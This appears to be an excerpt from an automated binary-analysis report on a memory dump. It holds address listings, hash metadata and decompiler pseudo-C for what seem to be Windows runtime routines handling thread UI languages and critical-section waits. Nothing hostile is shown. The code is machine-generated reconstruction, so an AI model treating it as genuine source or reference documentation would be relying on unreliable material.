                                                0x00ac2795
                                                0x00ac2798
                                                0x00ac2798
                                                0x00000000
                                                0x00ac2734
                                                0x00ac272c
                                                0x00ac2700
                                                0x00ac25ef
                                                0x00ac25ef
                                                0x00ac25ef
                                                0x00ac25f2
                                                0x00ac25f8
                                                0x00000000
                                                0x00000000
                                                0x00ac25fe
                                                0x00000000
                                                0x00ac28e6
                                                0x00ac28ec
                                                0x00ac28ef
                                                0x00ac28f5
                                                0x00ac28f8
                                                0x00ac28f8
                                                0x00000000
                                                0x00ac28f8
                                                0x00000000
                                                0x00000000
                                                0x00ac2866
                                                0x00ac2866
                                                0x00ac2876
                                                0x00ac2879
                                                0x00000000
                                                0x00000000
                                                0x00ac27e0
                                                0x00ac27e7
                                                0x00ac27e9
                                                0x00ac27eb
                                                0x00b05afd
                                                0x00000000
                                                0x00b05afd
                                                0x00000000
                                                0x00000000
                                                0x00ac2633
                                                0x00ac2638
                                                0x00ac263b
                                                0x00ac263c
                                                0x00ac263e
                                                0x00ac2640
                                                0x00ac2642
                                                0x00ac2647
                                                0x00ac2649
                                                0x00ac264e
                                                0x00ac2650
                                                0x00ac2653
                                                0x00ac2659
                                                0x00ac26a2
                                                0x00ac26a7
                                                0x00ac26ac
                                                0x00ac26b2
                                                0x00b05b11
                                                0x00b05b15
                                                0x00b05b17
                                                0x00000000
                                                0x00ac26b8
                                                0x00ac26b8
                                                0x00ac26ba
                                                0x00ac27a6
                                                0x00ac27a6
                                                0x00ac27a9
                                                0x00ac27ab
                                                0x00ac27b9
                                                0x00ac27b9
                                                0x00ac27be
                                                0x00ac27c1
                                                0x00ac27c3
                                                0x00ac27c5
                                                0x00ac27c7
                                                0x00b05c74
                                                0x00b05c79
                                                0x00b05c79
                                                0x00ac27c7
                                                0x00000000
                                                0x00ac26c0
                                                0x00ac26c0
                                                0x00ac26c3
                                                0x00ac26c6
                                                0x00ac26c6
                                                0x00ac26c9
                                                0x00ac26c9
                                                0x00000000
                                                0x00ac26c9
                                                0x00ac26ba
                                                0x00ac265b
                                                0x00ac265b
                                                0x00ac265e
                                                0x00ac2667
                                                0x00ac266d
                                                0x00ac2677
                                                0x00ac267c
                                                0x00ac267f
                                                0x00ac2681
                                                0x00b05b49
                                                0x00b05b4e
                                                0x00ac27cd
                                                0x00ac27d0
                                                0x00ac27d1
                                                0x00ac27d2
                                                0x00ac27d4
                                                0x00ac27dd
                                                0x00ac2687
                                                0x00ac2687
                                                0x00ac268a
                                                0x00ac268b
                                                0x00ac268e
                                                0x00ac268f
                                                0x00ac2691
                                                0x00ac2696
                                                0x00ac2698
                                                0x00ac269d
                                                0x00ac269f
                                                0x00000000
                                                0x00ac269f
                                                0x00ac2681
                                                0x00000000
                                                0x00000000
                                                0x00ac2846
                                                0x00000000
                                                0x00000000
                                                0x00ac2605
                                                0x00ac260a
                                                0x00ac260c
                                                0x00ac2611
                                                0x00ac2616
                                                0x00ac2619
                                                0x00ac2619
                                                0x00ac261e
                                                0x00000000
                                                0x00ac2624
                                                0x00ac2627
                                                0x00ac2627
                                                0x00000000
                                                0x00000000
                                                0x00b05b1f
                                                0x00000000
                                                0x00000000
                                                0x00ac2894
                                                0x00ac289b
                                                0x00ac289d
                                                0x00ac28a1
                                                0x00b05b2b
                                                0x00b05b2e
                                                0x00b05b2e
                                                0x00ac28a7
                                                0x00ac28a9
                                                0x00b05b04
                                                0x00b05b09
                                                0x00b05b09
                                                0x00b05b09
                                                0x00000000
                                                0x00000000
                                                0x00b05b35
                                                0x00b05b3c
                                                0x00ac28fb
                                                0x00ac28fb
                                                0x00ac26cc
                                                0x00ac26cc
                                                0x00ac26d0
                                                0x00000000
                                                0x00ac26d2
                                                0x00ac26d2
                                                0x00000000
                                                0x00ac26d2
                                                0x00000000
                                                0x00000000
                                                0x00ac25fe
                                                0x00ac292d
                                                0x00ac292f
                                                0x00ac2930
                                                0x00ac2935
                                                0x00ac2937
                                                0x00ac2938
                                                0x00ac293b
                                                0x00ac293c
                                                0x00ac293e
                                                0x00ac293f
                                                0x00ac2940
                                                0x00ac2942
                                                0x00ac2944
                                                0x00ac2947
                                                0x00ac2948
                                                0x00ac294e
                                                0x00ac2951
                                                0x00ac2951
                                                0x00ac2952
                                                0x00ac295b
                                                0x00ac295c
                                                0x00ac2962
                                                0x00ac2963
                                                0x00ac2964
                                                0x00ac2966
                                                0x00ac296e
                                                0x00ac296f
                                                0x00ac2972
                                                0x00ac2977
                                                0x00ac2978
                                                0x00ac297d
                                                0x00ac297e
                                                0x00ac297f
                                                0x00ac2980
                                                0x00ac2981
                                                0x00ac2982
                                                0x00ac2983
                                                0x00ac2984
                                                0x00ac2985
                                                0x00ac2986
                                                0x00ac2987
                                                0x00ac2988
                                                0x00ac2989
                                                0x00ac298a
                                                0x00ac298b
                                                0x00ac298c
                                                0x00ac298d
                                                0x00ac298e
                                                0x00ac298f
                                                0x00ac2990
                                                0x00ac2992
                                                0x00ac2997
                                                0x00ac29a3
                                                0x00ac29a6
                                                0x00ac29ab
                                                0x00ac29ad
                                                0x00ac29b0
                                                0x00ac29b2
                                                0x00b05c80
                                                0x00ac29b8
                                                0x00ac29b8
                                                0x00ac29bb
                                                0x00ac29c0
                                                0x00ac29c5
                                                0x00ac29c6
                                                0x00ac29c6
                                                0x00ac29c9
                                                0x00ac29cb
                                                0x00000000
                                                0x00000000
                                                0x00ac29cd
                                                0x00ac29d0
                                                0x00ac29d9
                                                0x00ac29db
                                                0x00ac29dd
                                                0x00ac2a7f
                                                0x00ac2a84
                                                0x00ac2a87
                                                0x00ac2a89
                                                0x00b05ca1
                                                0x00b05ca3
                                                0x00000000
                                                0x00ac2a8f
                                                0x00ac2a8f
                                                0x00000000
                                                0x00ac2a8f
                                                0x00000000
                                                0x00ac29e3
                                                0x00ac29e3
                                                0x00ac29e3
                                                0x00000000
                                                0x00ac29e3
                                                0x00ac29dd
                                                0x00000000
                                                0x00ac29db
                                                0x00ac29e6
                                                0x00ac29e9
                                                0x00ac29eb
                                                0x00ac29ed
                                                0x00ac29f3
                                                0x00ac29f5
                                                0x00ac29f8
                                                0x00ac29fa
                                                0x00ac2a97
                                                0x00ac2a9a
                                                0x00ac2a9d
                                                0x00ac2add
                                                0x00000000
                                                0x00ac2a9f
                                                0x00ac2aa2
                                                0x00ac2aa5
                                                0x00ac2aa8
                                                0x00ac2aab
                                                0x00b05cab
                                                0x00b05caf
                                                0x00b05cc5
                                                0x00b05cda
                                                0x00b05cdc
                                                0x00b05cdf
                                                0x00b05ce5
                                                0x00000000
                                                0x00b05ceb
                                                0x00b05ced
                                                0x00b05cee
                                                0x00000000
                                                0x00b05cee
                                                0x00b05cb1
                                                0x00b05cb4
                                                0x00b05cb9
                                                0x00b05cbb
                                                0x00000000
                                                0x00b05cbd
                                                0x00b05cbd
                                                0x00000000
                                                0x00b05cbd
                                                0x00b05cbb
                                                0x00ac2ab1
                                                0x00ac2ab1
                                                0x00ac2ac4
                                                0x00ac2ac6
                                                0x00ac2ac6
                                                0x00000000
                                                0x00ac2ac6
                                                0x00ac2aab
                                                0x00000000
                                                0x00ac2a00
                                                0x00ac2a09
                                                0x00ac2a0e
                                                0x00ac2a21
                                                0x00ac2a24
                                                0x00ac2a35
                                                0x00ac2a3a
                                                0x00ac2a3d
                                                0x00ac2a42
                                                0x00ac2a59
                                                0x00ac2a59
                                                0x00ac2a5c
                                                0x00ac2a5f
                                                0x00ac2a5f
                                                0x00ac29fa
                                                0x00ac29f3
                                                0x00ac2a64
                                                0x00ac2a64
                                                0x00ac2a6b
                                                0x00ac2a6b
                                                0x00ac2a6d
                                                0x00ac2a72
                                                0x00ac2a72
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: PATH
                                                • API String ID: 0-1036084923
                                                • Opcode ID: 04ae43cdf65031d7d8f9b03bd8cfa2524b9e2b0c5dd29fc07f245b428b23a713
                                                • Instruction ID: add9ca35174c218638f13cddbcd4c5660c27eba157dc0ae186ecb37a6538ffe7
                                                • Opcode Fuzzy Hash: 04ae43cdf65031d7d8f9b03bd8cfa2524b9e2b0c5dd29fc07f245b428b23a713
                                                • Instruction Fuzzy Hash: F2C15D75E00219DFCB25DF98D981FAEB7B5FF48700F5A4069E401BB2A1DB74A941CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 80%
                                                			E00ACFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                				char _v5;
                                                				signed int _v8;
                                                				signed int _v12;
                                                				char _v16;
                                                				char _v17;
                                                				char _v20;
                                                				signed int _v24;
                                                				char _v28;
                                                				char _v32;
                                                				signed int _v40;
                                                				void* __ecx;
                                                				void* __edi;
                                                				void* __ebp;
                                                				signed int _t73;
                                                				intOrPtr* _t75;
                                                				signed int _t77;
                                                				signed int _t79;
                                                				signed int _t81;
                                                				intOrPtr _t83;
                                                				intOrPtr _t85;
                                                				intOrPtr _t86;
                                                				signed int _t91;
                                                				signed int _t94;
                                                				signed int _t95;
                                                				signed int _t96;
                                                				signed int _t106;
                                                				signed int _t108;
                                                				signed int _t114;
                                                				signed int _t116;
                                                				signed int _t118;
                                                				signed int _t122;
                                                				signed int _t123;
                                                				void* _t129;
                                                				signed int _t130;
                                                				void* _t132;
                                                				intOrPtr* _t134;
                                                				signed int _t138;
                                                				signed int _t141;
                                                				signed int _t147;
                                                				intOrPtr _t153;
                                                				signed int _t154;
                                                				signed int _t155;
                                                				signed int _t170;
                                                				void* _t174;
                                                				signed int _t176;
                                                				signed int _t177;
                                                
                                                				_t129 = __ebx;
                                                				_push(_t132);
                                                				_push(__esi);
                                                				_t174 = _t132;
                                                				_t73 =  !( *( *(_t174 + 0x18)));
                                                				if(_t73 >= 0) {
                                                					L5:
                                                					return _t73;
                                                				} else {
                                                					E00AAEEF0(0xb87b60);
                                                					_t134 =  *0xb87b84; // 0x771c7b80
                                                					_t2 = _t174 + 0x24; // 0x24
                                                					_t75 = _t2;
                                                					if( *_t134 != 0xb87b80) {
                                                						_push(3);
                                                						asm("int 0x29");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						_push(0xb87b60);
                                                						_t170 = _v8;
                                                						_v28 = 0;
                                                						_v40 = 0;
                                                						_v24 = 0;
                                                						_v17 = 0;
                                                						_v32 = 0;
                                                						__eflags = _t170 & 0xffff7cf2;
                                                						if((_t170 & 0xffff7cf2) != 0) {
                                                							L43:
                                                							_t77 = 0xc000000d;
                                                						} else {
                                                							_t79 = _t170 & 0x0000000c;
                                                							__eflags = _t79;
                                                							if(_t79 != 0) {
                                                								__eflags = _t79 - 0xc;
                                                								if(_t79 == 0xc) {
                                                									goto L43;
                                                								} else {
                                                									goto L9;
                                                								}
                                                							} else {
                                                								_t170 = _t170 | 0x00000008;
                                                								__eflags = _t170;
                                                								L9:
                                                								_t81 = _t170 & 0x00000300;
                                                								__eflags = _t81 - 0x300;
                                                								if(_t81 == 0x300) {
                                                									goto L43;
                                                								} else {
                                                									_t138 = _t170 & 0x00000001;
                                                									__eflags = _t138;
                                                									_v24 = _t138;
                                                									if(_t138 != 0) {
                                                										__eflags = _t81;
                                                										if(_t81 != 0) {
                                                											goto L43;
                                                										} else {
                                                											goto L11;
                                                										}
                                                									} else {
                                                										L11:
                                                										_push(_t129);
                                                										_t77 = E00AA6D90( &_v20);
                                                										_t130 = _t77;
                                                										__eflags = _t130;
                                                										if(_t130 >= 0) {
                                                											_push(_t174);
                                                											__eflags = _t170 & 0x00000301;
                                                											if((_t170 & 0x00000301) == 0) {
                                                												_t176 = _a8;
                                                												__eflags = _t176;
                                                												if(__eflags == 0) {
                                                													L64:
                                                													_t83 =  *[fs:0x18];
                                                													_t177 = 0;
                                                													__eflags =  *(_t83 + 0xfb8);
                                                													if( *(_t83 + 0xfb8) != 0) {
                                                														E00AA76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                													}
                                                													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                													goto L15;
                                                												} else {
                                                													asm("sbb edx, edx");
                                                													_t114 = E00B38938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                													__eflags = _t114;
                                                													if(_t114 < 0) {
                                                														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                														E00A9B150();
                                                													}
                                                													_t116 = E00B36D81(_t176,  &_v16);
                                                													__eflags = _t116;
                                                													if(_t116 >= 0) {
                                                														__eflags = _v16 - 2;
                                                														if(_v16 < 2) {
                                                															L56:
                                                															_t118 = E00AA75CE(_v20, 5, 0);
                                                															__eflags = _t118;
                                                															if(_t118 < 0) {
                                                																L67:
                                                																_t130 = 0xc0000017;
                                                																goto L32;
                                                															} else {
                                                																__eflags = _v12;
                                                																if(_v12 == 0) {
                                                																	goto L67;
                                                																} else {
                                                																	_t153 =  *0xb88638; // 0x0
                                                																	_t122 = L00AA38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                																	_t154 = _v12;
                                                																	_t130 = _t122;
                                                																	__eflags = _t130;
                                                																	if(_t130 >= 0) {
                                                																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                																		__eflags = _t123;
                                                																		if(_t123 != 0) {
                                                																			_t155 = _a12;
                                                																			__eflags = _t155;
                                                																			if(_t155 != 0) {
                                                																				 *_t155 = _t123;
                                                																			}
                                                																			goto L64;
                                                																		} else {
                                                																			E00AA76E2(_t154);
                                                																			goto L41;
                                                																		}
                                                																	} else {
                                                																		E00AA76E2(_t154);
                                                																		_t177 = 0;
                                                																		goto L18;
                                                																	}
                                                																}
                                                															}
                                                														} else {
                                                															__eflags =  *_t176;
                                                															if( *_t176 != 0) {
                                                																goto L56;
                                                															} else {
                                                																__eflags =  *(_t176 + 2);
                                                																if( *(_t176 + 2) == 0) {
                                                																	goto L64;
                                                																} else {
                                                																	goto L56;
                                                																}
                                                															}
                                                														}
                                                													} else {
                                                														_t130 = 0xc000000d;
                                                														goto L32;
                                                													}
                                                												}
                                                												goto L35;
                                                											} else {
                                                												__eflags = _a8;
                                                												if(_a8 != 0) {
                                                													_t77 = 0xc000000d;
                                                												} else {
                                                													_v5 = 1;
                                                													L00ACFCE3(_v20, _t170);
                                                													_t177 = 0;
                                                													__eflags = 0;
                                                													L15:
                                                													_t85 =  *[fs:0x18];
                                                													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                														L18:
                                                														__eflags = _t130;
                                                														if(_t130 != 0) {
                                                															goto L32;
                                                														} else {
                                                															__eflags = _v5 - _t130;
                                                															if(_v5 == _t130) {
                                                																goto L32;
                                                															} else {
                                                																_t86 =  *[fs:0x18];
                                                																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                																}
                                                																__eflags = _t177;
                                                																if(_t177 == 0) {
                                                																	L31:
                                                																	__eflags = 0;
                                                																	L00AA70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                																	goto L32;
                                                																} else {
                                                																	__eflags = _v24;
                                                																	_t91 =  *(_t177 + 0x20);
                                                																	if(_v24 != 0) {
                                                																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                																		goto L31;
                                                																	} else {
                                                																		_t141 = _t91 & 0x00000040;
                                                																		__eflags = _t170 & 0x00000100;
                                                																		if((_t170 & 0x00000100) == 0) {
                                                																			__eflags = _t141;
                                                																			if(_t141 == 0) {
                                                																				L74:
                                                																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                																				goto L27;
                                                																			} else {
                                                																				_t177 = E00ACFD22(_t177);
                                                																				__eflags = _t177;
                                                																				if(_t177 == 0) {
                                                																					goto L42;
                                                																				} else {
                                                																					_t130 = E00ACFD9B(_t177, 0, 4);
                                                																					__eflags = _t130;
                                                																					if(_t130 != 0) {
                                                																						goto L42;
                                                																					} else {
                                                																						_t68 = _t177 + 0x20;
                                                																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                																						__eflags =  *_t68;
                                                																						_t91 =  *(_t177 + 0x20);
                                                																						goto L74;
                                                																					}
                                                																				}
                                                																			}
                                                																			goto L35;
                                                																		} else {
                                                																			__eflags = _t141;
                                                																			if(_t141 != 0) {
                                                																				_t177 = E00ACFD22(_t177);
                                                																				__eflags = _t177;
                                                																				if(_t177 == 0) {
                                                																					L42:
                                                																					_t77 = 0xc0000001;
                                                																					goto L33;
                                                																				} else {
                                                																					_t130 = E00ACFD9B(_t177, 0, 4);
                                                																					__eflags = _t130;
                                                																					if(_t130 != 0) {
                                                																						goto L42;
                                                																					} else {
                                                																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                																						_t91 =  *(_t177 + 0x20);
                                                																						goto L26;
                                                																					}
                                                																				}
                                                																				goto L35;
                                                																			} else {
                                                																				L26:
                                                																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                																				__eflags = _t94;
                                                																				L27:
                                                																				 *(_t177 + 0x20) = _t94;
                                                																				__eflags = _t170 & 0x00008000;
                                                																				if((_t170 & 0x00008000) != 0) {
                                                																					_t95 = _a12;
                                                																					__eflags = _t95;
                                                																					if(_t95 != 0) {
                                                																						_t96 =  *_t95;
                                                																						__eflags = _t96;
                                                																						if(_t96 != 0) {
                                                																							 *((short*)(_t177 + 0x22)) = 0;
                                                																							_t40 = _t177 + 0x20;
                                                																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                																							__eflags =  *_t40;
                                                																						}
                                                																					}
                                                																				}
                                                																				goto L31;
                                                																			}
                                                																		}
                                                																	}
                                                																}
                                                															}
                                                														}
                                                													} else {
                                                														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                														_t106 =  *(_t147 + 0x20);
                                                														__eflags = _t106 & 0x00000040;
                                                														if((_t106 & 0x00000040) != 0) {
                                                															_t147 = E00ACFD22(_t147);
                                                															__eflags = _t147;
                                                															if(_t147 == 0) {
                                                																L41:
                                                																_t130 = 0xc0000001;
                                                																L32:
                                                																_t77 = _t130;
                                                																goto L33;
                                                															} else {
                                                																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                																_t106 =  *(_t147 + 0x20);
                                                																goto L17;
                                                															}
                                                															goto L35;
                                                														} else {
                                                															L17:
                                                															_t108 = _t106 | 0x00000080;
                                                															__eflags = _t108;
                                                															 *(_t147 + 0x20) = _t108;
                                                															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                															goto L18;
                                                														}
                                                													}
                                                												}
                                                											}
                                                											L33:
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                						L35:
                                                						return _t77;
                                                					} else {
                                                						 *_t75 = 0xb87b80;
                                                						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                						 *_t134 = _t75;
                                                						 *0xb87b84 = _t75;
                                                						_t73 = E00AAEB70(_t134, 0xb87b60);
                                                						if( *0xb87b20 != 0) {
                                                							_t73 =  *( *[fs:0x30] + 0xc);
                                                							if( *((char*)(_t73 + 0x28)) == 0) {
                                                								_t73 = L00AAFF60( *0xb87b20);
                                                							}
                                                						}
                                                						goto L5;
                                                					}
                                                				}
                                                			}

















































                                                0x00acfc41
                                                0x00b0bf17
                                                0x00b0bf19
                                                0x00b0bf48
                                                0x00b0bf4b
                                                0x00000000
                                                0x00b0bf1b
                                                0x00b0bf22
                                                0x00b0bf24
                                                0x00b0bf26
                                                0x00000000
                                                0x00b0bf2c
                                                0x00b0bf37
                                                0x00b0bf39
                                                0x00b0bf3b
                                                0x00000000
                                                0x00b0bf41
                                                0x00b0bf41
                                                0x00b0bf41
                                                0x00b0bf41
                                                0x00b0bf45
                                                0x00000000
                                                0x00b0bf45
                                                0x00b0bf3b
                                                0x00b0bf26
                                                0x00000000
                                                0x00acfc47
                                                0x00acfc47
                                                0x00acfc49
                                                0x00acfcb2
                                                0x00acfcb4
                                                0x00acfcb6
                                                0x00acfcdc
                                                0x00acfcdc
                                                0x00000000
                                                0x00acfcb8
                                                0x00acfcc3
                                                0x00acfcc5
                                                0x00acfcc7
                                                0x00000000
                                                0x00acfcc9
                                                0x00acfcc9
                                                0x00acfccd
                                                0x00000000
                                                0x00acfccd
                                                0x00acfcc7
                                                0x00000000
                                                0x00acfc4b
                                                0x00acfc4b
                                                0x00acfc4e
                                                0x00acfc4e
                                                0x00acfc51
                                                0x00acfc51
                                                0x00acfc54
                                                0x00acfc5a
                                                0x00acfc5c
                                                0x00acfc5f
                                                0x00acfc61
                                                0x00acfc63
                                                0x00acfc65
                                                0x00acfc67
                                                0x00acfc6e
                                                0x00acfc72
                                                0x00acfc72
                                                0x00acfc72
                                                0x00acfc72
                                                0x00acfc67
                                                0x00acfc61
                                                0x00000000
                                                0x00acfc5a
                                                0x00acfc49
                                                0x00acfc41
                                                0x00acfc30
                                                0x00acfc27
                                                0x00acfc03
                                                0x00acfbcd
                                                0x00acfbd3
                                                0x00acfbd9
                                                0x00acfbdc
                                                0x00acfbde
                                                0x00acfc99
                                                0x00acfc9b
                                                0x00acfc9d
                                                0x00acfcd5
                                                0x00acfcd5
                                                0x00acfc89
                                                0x00acfc89
                                                0x00000000
                                                0x00acfc9f
                                                0x00acfc9f
                                                0x00acfca3
                                                0x00000000
                                                0x00acfca3
                                                0x00000000
                                                0x00acfbe4
                                                0x00acfbe4
                                                0x00acfbe4
                                                0x00acfbe4
                                                0x00acfbe9
                                                0x00acfbf2
                                                0x00000000
                                                0x00acfbf2
                                                0x00acfbde
                                                0x00acfbcb
                                                0x00acfbab
                                                0x00acfc8b
                                                0x00acfc8b
                                                0x00acfc8c
                                                0x00acfb80
                                                0x00acfb72
                                                0x00acfb5e
                                                0x00acfc8d
                                                0x00acfc91
                                                0x00acfadf
                                                0x00acfadf
                                                0x00acfae1
                                                0x00acfae4
                                                0x00acfae7
                                                0x00acfaec
                                                0x00acfaf8
                                                0x00acfb00
                                                0x00acfb07
                                                0x00acfb0f
                                                0x00acfb0f
                                                0x00acfb07
                                                0x00000000
                                                0x00acfaf8
                                                0x00acfadd

                                                Strings
                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00B0BE0F
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                • API String ID: 0-865735534
                                                • Opcode ID: d71662fd511cf66d984c5b56226a724a79daf20c00e38c270ed751767e16c15a
                                                • Instruction ID: c201d45a8d17fd6b1754d15508b65afa2fae937fbd5bbd1b12c9b054854aa2b6
                                                • Opcode Fuzzy Hash: d71662fd511cf66d984c5b56226a724a79daf20c00e38c270ed751767e16c15a
                                                • Instruction Fuzzy Hash: 5DA1DF71B0460A8FDB25DB68C850FAAB7F6EB49714F1546BEE806DB691DB30DC01CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 63%
                                                			E00A92D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                				signed char _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				signed int _v52;
                                                				void* __esi;
                                                				void* __ebp;
                                                				intOrPtr _t55;
                                                				signed int _t57;
                                                				signed int _t58;
                                                				char* _t62;
                                                				signed char* _t63;
                                                				signed char* _t64;
                                                				signed int _t67;
                                                				signed int _t72;
                                                				signed int _t77;
                                                				signed int _t78;
                                                				signed int _t88;
                                                				intOrPtr _t89;
                                                				signed char _t93;
                                                				signed int _t97;
                                                				signed int _t98;
                                                				signed int _t102;
                                                				signed int _t103;
                                                				intOrPtr _t104;
                                                				signed int _t105;
                                                				signed int _t106;
                                                				signed char _t109;
                                                				signed int _t111;
                                                				void* _t116;
                                                
                                                				_t102 = __edi;
                                                				_t97 = __edx;
                                                				_v12 = _v12 & 0x00000000;
                                                				_t55 =  *[fs:0x18];
                                                				_t109 = __ecx;
                                                				_v8 = __edx;
                                                				_t86 = 0;
                                                				_v32 = _t55;
                                                				_v24 = 0;
                                                				_push(__edi);
                                                				if(__ecx == 0xb85350) {
                                                					_t86 = 1;
                                                					_v24 = 1;
                                                					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                				}
                                                				_t103 = _t102 | 0xffffffff;
                                                				if( *0xb87bc8 != 0) {
                                                					_push(0xc000004b);
                                                					_push(_t103);
                                                					L00AD97C0();
                                                				}
                                                				if( *0xb879c4 != 0) {
                                                					_t57 = 0;
                                                				} else {
                                                					_t57 = 0xb879c8;
                                                				}
                                                				_v16 = _t57;
                                                				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                					_t93 = _t109;
                                                					L23();
                                                				}
                                                				_t58 =  *_t109;
                                                				if(_t58 == _t103) {
                                                					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                					_t58 = _t103;
                                                					if(__eflags == 0) {
                                                						_t93 = _t109;
                                                						E00AC1624(_t86, __eflags);
                                                						_t58 =  *_t109;
                                                					}
                                                				}
                                                				_v20 = _v20 & 0x00000000;
                                                				if(_t58 != _t103) {
                                                					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                				}
                                                				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                				_t88 = _v16;
                                                				_v28 = _t104;
                                                				L9:
                                                				while(1) {
                                                					if(E00AB7D50() != 0) {
                                                						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                					} else {
                                                						_t62 = 0x7ffe0382;
                                                					}
                                                					if( *_t62 != 0) {
                                                						_t63 =  *[fs:0x30];
                                                						__eflags = _t63[0x240] & 0x00000002;
                                                						if((_t63[0x240] & 0x00000002) != 0) {
                                                							_t93 = _t109;
                                                							E00B2FE87(_t93);
                                                						}
                                                					}
                                                					if(_t104 != 0xffffffff) {
                                                						_push(_t88);
                                                						_push(0);
                                                						_push(_t104);
                                                						_t64 = E00AD9520();
                                                						goto L15;
                                                					} else {
                                                						while(1) {
                                                							_t97 =  &_v8;
                                                							_t64 = E00ACE18B(_t109 + 4, _t97, 4, _t88, 0);
                                                							if(_t64 == 0x102) {
                                                								break;
                                                							}
                                                							_t93 =  *(_t109 + 4);
                                                							_v8 = _t93;
                                                							if((_t93 & 0x00000002) != 0) {
                                                								continue;
                                                							}
                                                							L15:
                                                							if(_t64 == 0x102) {
                                                								break;
                                                							}
                                                							_t89 = _v24;
                                                							if(_t64 < 0) {
                                                								L00AEDF30(_t93, _t97, _t64);
                                                								_push(_t93);
                                                								_t98 = _t97 | 0xffffffff;
                                                								__eflags =  *0xb86901;
                                                								_push(_t109);
                                                								_v52 = _t98;
                                                								if( *0xb86901 != 0) {
                                                									_push(0);
                                                									_push(1);
                                                									_push(0);
                                                									_push(0x100003);
                                                									_push( &_v12);
                                                									_t72 = E00AD9980();
                                                									__eflags = _t72;
                                                									if(_t72 < 0) {
                                                										_v12 = _t98 | 0xffffffff;
                                                									}
                                                								}
                                                								asm("lock cmpxchg [ecx], edx");
                                                								_t111 = 0;
                                                								__eflags = 0;
                                                								if(0 != 0) {
                                                									__eflags = _v12 - 0xffffffff;
                                                									if(_v12 != 0xffffffff) {
                                                										_push(_v12);
                                                										E00AD95D0();
                                                									}
                                                								} else {
                                                									_t111 = _v12;
                                                								}
                                                								return _t111;
                                                							} else {
                                                								if(_t89 != 0) {
                                                									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                									_t77 = E00AB7D50();
                                                									__eflags = _t77;
                                                									if(_t77 == 0) {
                                                										_t64 = 0x7ffe0384;
                                                									} else {
                                                										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                									}
                                                									__eflags =  *_t64;
                                                									if( *_t64 != 0) {
                                                										_t64 =  *[fs:0x30];
                                                										__eflags = _t64[0x240] & 0x00000004;
                                                										if((_t64[0x240] & 0x00000004) != 0) {
                                                											_t78 = E00AB7D50();
                                                											__eflags = _t78;
                                                											if(_t78 == 0) {
                                                												_t64 = 0x7ffe0385;
                                                											} else {
                                                												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                											}
                                                											__eflags =  *_t64 & 0x00000020;
                                                											if(( *_t64 & 0x00000020) != 0) {
                                                												_t64 = E00B17016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                											}
                                                										}
                                                									}
                                                								}
                                                								return _t64;
                                                							}
                                                						}
                                                						_t97 = _t88;
                                                						_t93 = _t109;
                                                						E00B2FDDA(_t97, _v12);
                                                						_t105 =  *_t109;
                                                						_t67 = _v12 + 1;
                                                						_v12 = _t67;
                                                						__eflags = _t105 - 0xffffffff;
